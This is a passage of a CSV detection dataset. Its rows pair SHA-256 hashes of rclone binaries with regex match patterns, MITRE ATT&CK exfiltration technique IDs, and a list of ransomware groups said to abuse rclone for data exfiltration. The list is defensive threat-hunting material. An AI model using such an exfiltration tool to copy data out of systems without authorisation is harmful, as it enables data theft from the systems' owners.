Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*d76e6248bbbac71a6066ad5c2e1908971c04e82db9ec2b14024c5bd8256a0e16*",".{0,1000}d76e6248bbbac71a6066ad5c2e1908971c04e82db9ec2b14024c5bd8256a0e16.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*d76ff4ce0fd6ea09c3585da889e833b060e62752d4459e0982805596ceb1f4d0*",".{0,1000}d76ff4ce0fd6ea09c3585da889e833b060e62752d4459e0982805596ceb1f4d0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*d7f98934b1bf71960575a07e022836d6d9d68919885a0766b52c50d30cfa926c*",".{0,1000}d7f98934b1bf71960575a07e022836d6d9d68919885a0766b52c50d30cfa926c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*d83e8652c11bd2324721eaf55a2308c71be9233ef15ce72ce06c3e9fedab6320*",".{0,1000}d83e8652c11bd2324721eaf55a2308c71be9233ef15ce72ce06c3e9fedab6320.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*d86d0e7d28948669b8180e8e16ae68db0fd794e918842ac4a21c58b8f41b75ee*",".{0,1000}d86d0e7d28948669b8180e8e16ae68db0fd794e918842ac4a21c58b8f41b75ee.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*d8902a73e518bf15abfd269a8e75d3aac0965e09a185f0aef9c99ef3e903bdac*",".{0,1000}d8902a73e518bf15abfd269a8e75d3aac0965e09a185f0aef9c99ef3e903bdac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*d8e28bded459511fc27e300d88c4bee0fda36e7e6222d6d9b9a32e5986163881*",".{0,1000}d8e28bded459511fc27e300d88c4bee0fda36e7e6222d6d9b9a32e5986163881.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*d8ff06a0103bf12f790b0c95c41a7c5907d48d1d11a8e68ba2f4b78129a28d30*",".{0,1000}d8ff06a0103bf12f790b0c95c41a7c5907d48d1d11a8e68ba2f4b78129a28d30.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*d90f7f2b3421cf2f3342f143358dcbeed09ce2580338f184b31c79ab4a24a5de*",".{0,1000}d90f7f2b3421cf2f3342f143358dcbeed09ce2580338f184b31c79ab4a24a5de.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*d9aebc560abab311a8fe955f4e01952d542e033c368751f892dfa69f504b1eab*",".{0,1000}d9aebc560abab311a8fe955f4e01952d542e033c368751f892dfa69f504b1eab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*da0f02b6a9829a8719731e156b78f7a647075d53d48d784ba530a2477f76f263*",".{0,1000}da0f02b6a9829a8719731e156b78f7a647075d53d48d784ba530a2477f76f263.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*da1645fa73088118140bdcc6e29203194532b81a7653a17632e3bf191a41a372*",".{0,1000}da1645fa73088118140bdcc6e29203194532b81a7653a17632e3bf191a41a372.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*da638646b76966fe9ba2ab4a49aa9fa74324e58d5abaec2ebf9657069a905699*",".{0,1000}da638646b76966fe9ba2ab4a49aa9fa74324e58d5abaec2ebf9657069a905699.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*db195f43c7e99cd90369d0598c414025df797c3496e8dd9299162fae7d013833*",".{0,1000}db195f43c7e99cd90369d0598c414025df797c3496e8dd9299162fae7d013833.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*db3860e4549af28d87aa83f2035a57c5d081b179e40d4c828db19c3c3545831e*",".{0,1000}db3860e4549af28d87aa83f2035a57c5d081b179e40d4c828db19c3c3545831e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*dbddf4f46acf5b70e2885afac12a8c7caca7f3ea2d431011050635441869131f*",".{0,1000}dbddf4f46acf5b70e2885afac12a8c7caca7f3ea2d431011050635441869131f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*dbe8f08cde1240ef9425df1a9412d4810d1bc9cbeada6b4129da15492e118af1*",".{0,1000}dbe8f08cde1240ef9425df1a9412d4810d1bc9cbeada6b4129da15492e118af1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*dc11292f98803ea780d812c6a0cb957a303f0668f36a0fbdf08196c6458a12cc*",".{0,1000}dc11292f98803ea780d812c6a0cb957a303f0668f36a0fbdf08196c6458a12cc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*dc2112e7872f7aabd0548c2c74bcb3c09abda32da66efa287a4c7d5b305bdc6f*",".{0,1000}dc2112e7872f7aabd0548c2c74bcb3c09abda32da66efa287a4c7d5b305bdc6f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*dc3544d369e57c44211b4d294186038898043b1b872c4204bf01513bf0635ecf*",".{0,1000}dc3544d369e57c44211b4d294186038898043b1b872c4204bf01513bf0635ecf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*dc3934092975417bf1fb22470daa452b7c1e8aeb82984fe2afb83bc3ea090198*",".{0,1000}dc3934092975417bf1fb22470daa452b7c1e8aeb82984fe2afb83bc3ea090198.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*dc91864dd189d8c80a0af5d1ec1078cf26fd921967938a04e55fbf1987871944*",".{0,1000}dc91864dd189d8c80a0af5d1ec1078cf26fd921967938a04e55fbf1987871944.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*dd01f5fd5874d12b64228e10f0e91d849837797160d83b91ad230c3caaa40ff6*",".{0,1000}dd01f5fd5874d12b64228e10f0e91d849837797160d83b91ad230c3caaa40ff6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*dd174e6ae3e31d412415793d6673f25c1ea4fac29a8893fe28ff378a928d1c0f*",".{0,1000}dd174e6ae3e31d412415793d6673f25c1ea4fac29a8893fe28ff378a928d1c0f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*dd177de3063581532bfbdb69d3e9fd8e14ceb99c6024b8b834f3ee39a41c4e51*",".{0,1000}dd177de3063581532bfbdb69d3e9fd8e14ceb99c6024b8b834f3ee39a41c4e51.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*dd2eb9c46d44cf9f19ebc8f66878d1d83d57577e2db6385e16df68a28557cd89*",".{0,1000}dd2eb9c46d44cf9f19ebc8f66878d1d83d57577e2db6385e16df68a28557cd89.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*dd53ac86689c6ca265dd0d8f1034e7abd37a250cb947cb086c7118696d4e3ec3*",".{0,1000}dd53ac86689c6ca265dd0d8f1034e7abd37a250cb947cb086c7118696d4e3ec3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*dda4a8958cfd93dd0262179e2a004fadcd37bb7f6fb6f380aa2751a03e249c6c*",".{0,1000}dda4a8958cfd93dd0262179e2a004fadcd37bb7f6fb6f380aa2751a03e249c6c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*ddcefa1ee3f141a9cee6d2e6e03c3c33bfd9a3db08cc1b3d41e4c7b72e4989ba*",".{0,1000}ddcefa1ee3f141a9cee6d2e6e03c3c33bfd9a3db08cc1b3d41e4c7b72e4989ba.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*de3f8129b3a84690c971d6f79a1ce6de1d172801d966604390e3f16c377100ef*",".{0,1000}de3f8129b3a84690c971d6f79a1ce6de1d172801d966604390e3f16c377100ef.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*de777ae5bdfb563ee399e8a82ef9935b79a79b4ca481fa25206693258b1af5e7*",".{0,1000}de777ae5bdfb563ee399e8a82ef9935b79a79b4ca481fa25206693258b1af5e7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*de9c3e61bc6fd881bf70235f0cb50091076f714734045cf5602926c8945f7aa6*",".{0,1000}de9c3e61bc6fd881bf70235f0cb50091076f714734045cf5602926c8945f7aa6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*debdf9b5cd864002a9a44b75be3d7be91cfb09a5aedc31b1d0492d0ee98410e2*",".{0,1000}debdf9b5cd864002a9a44b75be3d7be91cfb09a5aedc31b1d0492d0ee98410e2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*dedc5cd6e34d8636eab14c6ea858d1b83de7b546b69eb5538ea6a2ec69a8b5d5*",".{0,1000}dedc5cd6e34d8636eab14c6ea858d1b83de7b546b69eb5538ea6a2ec69a8b5d5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*def14719031db5f38976c4b41b7d303f5ddb1dd59a31183094873cdcfc1242c0*",".{0,1000}def14719031db5f38976c4b41b7d303f5ddb1dd59a31183094873cdcfc1242c0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*df132038b69a2e69319d01d79c7523cc7d97399d2134fd555484e52f760a7778*",".{0,1000}df132038b69a2e69319d01d79c7523cc7d97399d2134fd555484e52f760a7778.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon 